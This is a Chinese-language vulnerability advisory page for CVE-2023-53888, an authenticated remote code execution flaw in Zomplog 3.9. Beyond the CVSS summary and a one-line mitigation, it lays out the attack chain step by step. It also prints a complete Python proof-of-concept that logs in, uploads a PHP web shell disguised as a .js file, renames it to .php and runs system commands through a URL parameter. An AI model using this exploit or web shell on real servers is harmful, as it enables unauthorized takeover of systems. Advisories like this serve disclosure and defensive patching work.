CVE-2023-53888 CVSS 8.8 高危

CVE-2023-53888: Zomplog 3.9 远程代码执行漏洞

披露日期: 2025-12-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2023-53888

漏洞类型

远程代码执行（RCE）

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Zomplog 3.9

漏洞概述

Zomplog 3.9版本存在远程代码执行漏洞，允许认证用户通过文件操作端点注入并执行任意PHP代码。攻击者可以利用saveE和rename操作上传恶意JavaScript文件并将其重命名为PHP，从而执行系统命令。该漏洞的CVSS评分为8.8，属于高危漏洞，通过网络即可发起攻击，无需用户交互。

技术细节

漏洞源于Zomplog应用程序的文件操作端点存在缺陷。攻击者首先通过saveE操作上传包含恶意PHP代码的JavaScript文件，随后利用rename操作将其扩展名改为.php，使其被服务器作为PHP脚本执行。最终实现任意代码执行，可用于完全控制受影响系统。

攻击链分析

STEP 1

攻击者通过saveE操作上传包含恶意PHP代码的JavaScript文件

STEP 2

利用rename操作将文件扩展名从.js改为.php

STEP 3

访问重命名后的PHP文件，触发代码执行

STEP 4

通过URL参数传递系统命令，实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# 目标URL
target_url = 'http://target.com/zomplog'

# 登录获取认证
login_url = f'{target_url}/login.php'
credentials = {'username': 'attacker', 'password': 'password'}
session = requests.Session()
session.post(login_url, data=credentials)

# 上传恶意文件
upload_url = f'{target_url}/admin/saveE.php'
malicious_code = '<?php system($_GET["cmd"]); ?>'
files = {'file': ('malicious.js', malicious_code)}
session.post(upload_url, files=files)

# 重命名为PHP
rename_url = f'{target_url}/admin/rename.php'
rename_data = {'old_name': 'malicious.js', 'new_name': 'malicious.php'}
session.post(rename_url, data=rename_data)

# 执行命令
cmd_url = f'{target_url}/uploads/malicious.php'
response = session.get(cmd_url, params={'cmd': 'whoami'})
print(response.text)

影响范围

Zomplog 3.9

防御指南

临时缓解措施

立即升级Zomplog至最新版本，或暂时禁用文件上传功能

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表